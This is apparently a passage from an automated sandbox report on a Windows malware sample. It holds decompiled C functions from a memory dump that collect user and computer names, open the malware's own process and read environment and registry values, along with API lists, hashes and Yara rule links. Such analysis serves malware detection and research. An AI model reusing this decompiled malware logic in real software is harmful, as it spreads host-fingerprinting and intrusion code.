					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                          0x005e487a
                                                          0x005e487e
                                                          0x005e4880
                                                          0x005e4881
                                                          0x005e4889
                                                          0x005e4889
                                                          0x005e488d
                                                          0x00000000
                                                          0x00000000
                                                          0x005e4884
                                                          0x005e4885
                                                          0x005e4888
                                                          0x005e4888
                                                          0x005e4895
                                                          0x005e489a
                                                          0x005e48a0
                                                          0x005e48a8
                                                          0x005e48ae
                                                          0x005e48b0
                                                          0x005e48b5
                                                          0x005e48b9
                                                          0x005e48bb
                                                          0x005e48be
                                                          0x005e48c5
                                                          0x005e48c5
                                                          0x005e48cf
                                                          0x005e48d2
                                                          0x005e48d3
                                                          0x005e48d5
                                                          0x005e48e1
                                                          0x005e48e1
                                                          0x005e48ee

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,016695AC,?,%]^,?,005E243F,016695AC,?,005E5D25), ref: 005E4889
                                                          • StrTrimA.SHLWAPI(?,005EC284,00000002,?,%]^,?,005E243F,016695AC,?,005E5D25), ref: 005E48A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,%]^,?,005E243F,016695AC,?,005E5D25), ref: 005E48B3
                                                          • StrTrimA.SHLWAPI(00000001,005EC284,?,%]^,?,005E243F,016695AC,?,005E5D25), ref: 005E48C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID: %]^
                                                          • API String ID: 3043112668-1107362547
                                                          • Opcode ID: 294f46572ccb704719e489c4c89e541e4821f675316c2e9def491d70bb296f95
                                                          • Instruction ID: 4fa4c1ee066485c5a76f7fdcd02e2ff6569d7a6f96af1af0ec3a753583fdf0ea
                                                          • Opcode Fuzzy Hash: 294f46572ccb704719e489c4c89e541e4821f675316c2e9def491d70bb296f95
                                                          • Instruction Fuzzy Hash: 5A01B576A093D19BD2299F678C48E27BFA8FB95B50F110559F9C2C7240DB60C802DAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005EA199, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E005EA199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E005EA71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E005EA734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x5e1fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                          0x005ea1a7
                                                          0x005ea1aa
                                                          0x005ea1ad
                                                          0x005ea1b3
                                                          0x005ea1b8
                                                          0x005ea1be
                                                          0x005ea1c6
                                                          0x005ea1c9
                                                          0x005ea1cf
                                                          0x005ea1d4
                                                          0x005ea1e1
                                                          0x005ea1ee
                                                          0x005ea1f2
                                                          0x005ea1f4
                                                          0x005ea1f8
                                                          0x005ea1fb
                                                          0x005ea20b
                                                          0x005ea25e
                                                          0x005ea25f
                                                          0x005ea20d
                                                          0x005ea212
                                                          0x005ea213
                                                          0x005ea218
                                                          0x005ea21b
                                                          0x005ea22e
                                                          0x00000000
                                                          0x005ea230
                                                          0x005ea233
                                                          0x005ea238
                                                          0x005ea246
                                                          0x005ea249
                                                          0x005ea24f
                                                          0x005ea254
                                                          0x00000000
                                                          0x005ea256
                                                          0x005ea256
                                                          0x005ea259
                                                          0x005ea259
                                                          0x005ea254
                                                          0x005ea22e
                                                          0x005ea264
                                                          0x005ea265
                                                          0x005ea1d4
                                                          0x005ea26b

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,005E1FD2), ref: 005EA1AD
                                                          • GetComputerNameW.KERNEL32(00000000,005E1FD2), ref: 005EA1C9
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • GetUserNameW.ADVAPI32(00000000,005E1FD2), ref: 005EA203
                                                          • GetComputerNameW.KERNEL32(005E1FD2,?), ref: 005EA226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,005E1FD2,00000000,005E1FD4,00000000,00000000,?,?,005E1FD2), ref: 005EA249
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 2d78962d37dfcbf2b4666c458600becc64a07a6211e666da89ed5d534bd6167e
                                                          • Instruction ID: 44354c89d732029c000b26dfc0d2817f33c2ce87cfad39c2f3426294ac311dab
                                                          • Opcode Fuzzy Hash: 2d78962d37dfcbf2b4666c458600becc64a07a6211e666da89ed5d534bd6167e
                                                          • Instruction Fuzzy Hash: BE21F976901248FFCB15DFE5C988CEEBBB9FF84304B1044AAE641E7240E630AB45DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E3DE9, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E005E3DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E005E5AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E005EA81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x5ed128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                          0x005e3de9
                                                          0x005e3df6
                                                          0x005e3df8
                                                          0x005e3e5b
                                                          0x00000000
                                                          0x005e3e5b
                                                          0x005e3e10
                                                          0x005e3e17
                                                          0x005e3e23
                                                          0x005e3e28
                                                          0x005e3e2a
                                                          0x005e3e2c
                                                          0x005e3e2e
                                                          0x005e3e30
                                                          0x005e3e32
                                                          0x005e3e3e
                                                          0x005e3e4e
                                                          0x00000000
                                                          0x005e3e40
                                                          0x005e3e40
                                                          0x005e3e47
                                                          0x005e3e54
                                                          0x005e3e54
                                                          0x005e3e54
                                                          0x005e3e47
                                                          0x005e3e3e
                                                          0x005e3e59
                                                          0x00000000
                                                          0x00000000
                                                          0x005e3e5f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,005E67B8,?,?,00000000,00000000), ref: 005E3E23
                                                          • ResetEvent.KERNEL32(?), ref: 005E3E28
                                                          • GetLastError.KERNEL32 ref: 005E3E40
                                                          • GetLastError.KERNEL32(?,?,00000102,005E67B8,?,?,00000000,00000000), ref: 005E3E5B
                                                            • Part of subcall function 005E5AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?,?,00000000), ref: 005E5AFD
                                                            • Part of subcall function 005E5AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?), ref: 005E5B5B
                                                            • Part of subcall function 005E5AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 005E5B6B
                                                          • SetEvent.KERNEL32(?), ref: 005E3E4E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 1050e8ca13502b11d51259ac7780605de05287370376f5dd37f785e83d3fc3f7
                                                          • Instruction ID: 2c70de9930c8c0051d1e3cdccbf7188e87ee558b9311db358e099c215467838f
                                                          • Opcode Fuzzy Hash: 1050e8ca13502b11d51259ac7780605de05287370376f5dd37f785e83d3fc3f7
                                                          • Instruction Fuzzy Hash: 3901A231104381ABD7386B72DC8CF1BBFA8BF54764F110A24F5D1D60E0D720D909EA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E3E69, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E005E3E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x5ed26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x5ed25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x5ed258 = _t6;
					 *0x5ed264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x5ed254 = _t7;
					if(_t7 == 0) {
						 *0x5ed254 =  *0x5ed254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                          0x005e3e71
                                                          0x005e3e77
                                                          0x005e3e7e
                                                          0x00000000
                                                          0x005e3ed8
                                                          0x005e3e80
                                                          0x005e3e88
                                                          0x005e3e95
                                                          0x005e3e95
                                                          0x005e3ed5
                                                          0x00000000
                                                          0x005e3ed5
                                                          0x005e3e97
                                                          0x005e3e97
                                                          0x005e3e9c
                                                          0x005e3eae
                                                          0x005e3eb3
                                                          0x005e3eb9
                                                          0x005e3ebf
                                                          0x005e3ec6
                                                          0x005e3ec8
                                                          0x005e3ec8
                                                          0x00000000
                                                          0x005e3ecf
                                                          0x005e3e91
                                                          0x00000000
                                                          0x00000000
                                                          0x005e3e93
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,005E131F,?,?,00000001,?,?,?,005E4EF2,?), ref: 005E3E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,005E4EF2,?), ref: 005E3E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,005E4EF2,?), ref: 005E3E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,005E4EF2,?), ref: 005E3EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,005E4EF2,?), ref: 005E3ED8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: b30b99bbf44ee614e4129c72ae15a6688877db2bbabfb3406beb42c041576b74
                                                          • Instruction ID: 6e4847ef290cbe9cb20d7358dfb175e18c3f4d323c94b3f4f38a69d519505787
                                                          • Opcode Fuzzy Hash: b30b99bbf44ee614e4129c72ae15a6688877db2bbabfb3406beb42c041576b74
                                                          • Instruction Fuzzy Hash: BEF06DB4A403C19BD72C8B35AC8DB193F66B7A0741F100415E6D2CF2E0D771C50AEB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E853F, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E005E853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x5ed33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E005E9070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E005E6E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E005EA734(_a8);
						goto L29;
					}
					_t64 =  *0x5ed278; // 0x1669a98
					_t16 = _t64 + 0xc; // 0x1669b66
					_t65 = E005E9070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d005ec0
						if(E005E22F1(_t97,  *_t33, _t91, _a8,  *0x5ed334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x5ed2a8; // 0x107a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x5eea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x5ee8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E005E6C38(_t69,  *0x5ed334,  *0x5ed338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x5ed2a8; // 0x107a5a8
									_t44 = _t71 + 0x5ee846; // 0x74666f53
									_t73 = E005E9070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d005ec0
										E005E5D7D( *_t47, _t91, _a8,  *0x5ed338, _a24);
										_t49 = _t101 + 0x10; // 0x3d005ec0
										E005E5D7D( *_t49, _t91, _t99,  *0x5ed330, _a16);
										E005EA734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d005ec0
									E005E5D7D( *_t40, _t91, _a8,  *0x5ed338, _a24);
									_t43 = _t101 + 0x10; // 0x3d005ec0
									E005E5D7D( *_t43, _t91, _a8,  *0x5ed330, _a16);
								}
								if( *_t101 != 0) {
									E005EA734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d005ec0
					_t81 = E005E8BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d005ec0
							E005E22F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E005EA734(_t100);
						_t98 = _a16;
					}
					E005EA734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E005EA749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x5ed33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                          0x005e853f
                                                          0x005e8548
                                                          0x005e854f
                                                          0x005e8554
                                                          0x005e85c1
                                                          0x005e85c7
                                                          0x005e85cc
                                                          0x005e85d3
                                                          0x005e85d8
                                                          0x005e85dd
                                                          0x005e8748
                                                          0x005e874f
                                                          0x005e874f
                                                          0x005e8754
                                                          0x005e8756
                                                          0x005e8756
                                                          0x005e875f
                                                          0x005e875f
                                                          0x005e85e3
                                                          0x005e85ef
                                                          0x005e873e
                                                          0x005e8741
                                                          0x00000000
                                                          0x005e8741
                                                          0x005e85f5
                                                          0x005e85fa
                                                          0x005e85fd
                                                          0x005e8602
                                                          0x005e8607
                                                          0x005e8650
                                                          0x005e8650
                                                          0x005e8663
                                                          0x005e866d
                                                          0x005e8673
                                                          0x005e867a
                                                          0x005e8684
                                                          0x005e8684
                                                          0x005e867c
                                                          0x005e867c
                                                          0x005e867c
                                                          0x005e867c
                                                          0x005e86a6
                                                          0x005e86ae
                                                          0x005e86dc
                                                          0x005e86e1
                                                          0x005e86e8
                                                          0x005e86ed
                                                          0x005e86f1
                                                          0x005e8723
                                                          0x005e86f3
                                                          0x005e8700
                                                          0x005e8703
                                                          0x005e8713
                                                          0x005e8716
                                                          0x005e871c
                                                          0x005e871c
                                                          0x005e86b0
                                                          0x005e86bd
                                                          0x005e86c0
                                                          0x005e86d2
                                                          0x005e86d5
                                                          0x005e86d5
                                                          0x005e872d
                                                          0x005e8739
                                                          0x005e872f
                                                          0x005e8732
                                                          0x005e8732
                                                          0x005e872d
                                                          0x005e86a6
                                                          0x00000000
                                                          0x005e866d
                                                          0x005e8616
                                                          0x005e8619
                                                          0x005e8620
                                                          0x005e8626
                                                          0x005e8629
                                                          0x005e862b
                                                          0x005e8637
                                                          0x005e863a
                                                          0x005e863a
                                                          0x005e8640
                                                          0x005e8645
                                                          0x005e8645
                                                          0x005e864b
                                                          0x00000000
                                                          0x005e864b
                                                          0x005e8559
                                                          0x00000000
                                                          0x005e8580
                                                          0x005e8580
                                                          0x005e858c
                                                          0x005e859f
                                                          0x005e85a5
                                                          0x005e85ad
                                                          0x00000000
                                                          0x005e85ad

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000005F,00000000,00000000,00000104), ref: 005E8572
                                                          • lstrcpy.KERNEL32(?,?), ref: 005E859F
                                                            • Part of subcall function 005E9070: lstrlen.KERNEL32(?,00000000,01669A98,00000000,005E8808,01669C76,?,?,?,?,?,63699BC3,00000005,005ED00C), ref: 005E9077
                                                            • Part of subcall function 005E9070: mbstowcs.NTDLL ref: 005E90A0
                                                            • Part of subcall function 005E9070: memset.NTDLL ref: 005E90B2
                                                            • Part of subcall function 005E5D7D: lstrlenW.KERNEL32(?,?,?,005E8708,3D005EC0,80000002,?,005EA513,74666F53,4D4C4B48,005EA513,?,3D005EC0,80000002,?,?), ref: 005E5DA2
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 005E85C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: A7^
                                                          • API String ID: 3924217599-2462966306
                                                          • Opcode ID: 399570754ce1dc97e590bf1976e64df3d6a3ecc291d785cd1eb52af23b0e93f6
                                                          • Instruction ID: 820a16797a4b830656163e1383d410b4552854c50aacfe605305f0e911ec927d
                                                          • Opcode Fuzzy Hash: 399570754ce1dc97e590bf1976e64df3d6a3ecc291d785cd1eb52af23b0e93f6
                                                          • Instruction Fuzzy Hash: 28519F7600028AEFCF19AF62DD88EAA3FB9FF58340F104514F9955A120DB32DD19EB21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E1C66, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 151stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E005E1C66(void* __eflags, int _a4) {
				intOrPtr _v12;
				char _v16;
				WCHAR* _v20;
				char* _v24;
				int _v28;
				void* _v40;
				char _v44;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				void _v88;
				char _v92;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t53;
				void* _t76;
				WCHAR* _t80;
				intOrPtr _t82;

				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t42 =  *0x5ed278; // 0x1669a98
				_t5 = _t42 + 0x48; // 0x1669c1d
				_t82 =  *_t5;
				_t6 = _t42 + 0x4c; // 0x1669c29
				_v16 =  *_t6;
				_t44 =  *0x5ed2a8; // 0x107a5a8
				_t8 = _t44 + 0x5eee20; // 0x410025
				_t80 = E005E468E(_t8);
				_v20 = _t80;
				if(_t80 == 0) {
					_t76 = 8;
					L24:
					return _t76;
				}
				if(StrCmpNIW(_t80, _a4, lstrlenW(_t80)) != 0) {
					_t76 = 1;
					L22:
					E005EA734(_v20);
					goto L24;
				}
				if(E005EA2F9(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t53 = E005E9070(_t52,  *0x5ed33c);
				_v12 = _t53;
				if(_t53 == 0) {
					_t76 = 8;
					goto L19;
				} else {
					_t84 = E005E9070(_t53, _t82);
					if(_t55 == 0) {
						_t76 = 8;
					} else {
						_t76 = E005E8BC1(_a4, 0x80000001, _v12, _t84,  &_v92,  &_v88);
						_t55 = E005EA734(_t84);
					}
					if(_t76 != 0) {
						L17:
						E005EA734(_v12);
						L19:
						_t83 = _a4;
						if(_a4 != 0) {
							E005E4F14(_t83);
						}
						goto L22;
					} else {
						if(( *0x5ed260 & 0x00000001) == 0) {
							L14:
							E005E1709(_v88, _v92,  *0x5ed270, 0);
							_t76 = E005E6D8A(_v92,  &_v84,  &_v80, 0);
							if(_t76 == 0) {
								_v28 = _a4;
								_v24 =  &_v92;
								_t76 = E005E11EE( &_v44, 0);
							}
							E005EA734(_v92);
							goto L17;
						}
						_t20 =  &_v16; // 0x5e5d4f
						_t86 = E005E9070(_t55,  *_t20);
						if(_t67 == 0) {
							_t76 = 8;
						} else {
							_t76 = E005E8BC1(_a4, 0x80000001, _v12, _t86,  &_v76,  &_v72);
							E005EA734(_t86);
						}
						if(_t76 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}























                                                          0x005e1c78
                                                          0x005e1c7b
                                                          0x005e1c82
                                                          0x005e1c88
                                                          0x005e1c89
                                                          0x005e1c8a
                                                          0x005e1c8b
                                                          0x005e1c8c
                                                          0x005e1c8d
                                                          0x005e1c92
                                                          0x005e1c92
                                                          0x005e1c95
                                                          0x005e1c98
                                                          0x005e1c9b
                                                          0x005e1ca3
                                                          0x005e1caf
                                                          0x005e1cb1
                                                          0x005e1cb6
                                                          0x005e1dea
                                                          0x005e1ded
                                                          0x005e1df1
                                                          0x005e1df1
                                                          0x005e1cd0
                                                          0x005e1ddd
                                                          0x005e1dde
                                                          0x005e1de1
                                                          0x00000000
                                                          0x005e1de1
                                                          0x005e1ce2
                                                          0x005e1ce4
                                                          0x005e1ce4
                                                          0x005e1ced
                                                          0x005e1cf2
                                                          0x005e1cf7
                                                          0x005e1dcc
                                                          0x00000000
                                                          0x005e1cfd
                                                          0x005e1d03
                                                          0x005e1d0c
                                                          0x005e1d2f
                                                          0x005e1d0e
                                                          0x005e1d24
                                                          0x005e1d26
                                                          0x005e1d26
                                                          0x005e1d32
                                                          0x005e1dc0
                                                          0x005e1dc3
                                                          0x005e1dcd
                                                          0x005e1dcd
                                                          0x005e1dd2
                                                          0x005e1dd4
                                                          0x005e1dd4
                                                          0x00000000
                                                          0x005e1d38
                                                          0x005e1d3f
                                                          0x005e1d75
                                                          0x005e1d84
                                                          0x005e1d9a
                                                          0x005e1d9e
                                                          0x005e1da3
                                                          0x005e1da9
                                                          0x005e1db6
                                                          0x005e1db6
                                                          0x005e1dbb
                                                          0x00000000
                                                          0x005e1dbb
                                                          0x005e1d41
                                                          0x005e1d49
                                                          0x005e1d4d
                                                          0x005e1d70
                                                          0x005e1d4f
                                                          0x005e1d65
                                                          0x005e1d67
                                                          0x005e1d67
                                                          0x005e1d73
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e1d73
                                                          0x005e1d32

                                                          APIs
                                                          • memset.NTDLL ref: 005E1C7B
                                                            • Part of subcall function 005E468E: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,01669C1D,00000000,005E1CAF,00410025,00000005,?,00000000), ref: 005E469F
                                                            • Part of subcall function 005E468E: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 005E46BC
                                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 005E1CBD
                                                          • StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 005E1CC8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                          • String ID: O]^
                                                          • API String ID: 3817122888-121719813
                                                          • Opcode ID: bad8cc340b0aefefa074feaa9446bfdcb1384b51bfdc21faecfd29b609c808a1
                                                          • Instruction ID: a78d68e952d0e5798b29582368ba1c9780207f1c5c7a553e7b0bb994bc8bf272
                                                          • Opcode Fuzzy Hash: bad8cc340b0aefefa074feaa9446bfdcb1384b51bfdc21faecfd29b609c808a1
                                                          • Instruction Fuzzy Hash: 2B418072900699ABCB19AFE6CD89DEE7FBCFF48350F100425F981AB111D6319D458BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E53C6, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E005E53C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E005E1AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E005E50FF(_t79,  &_v236);
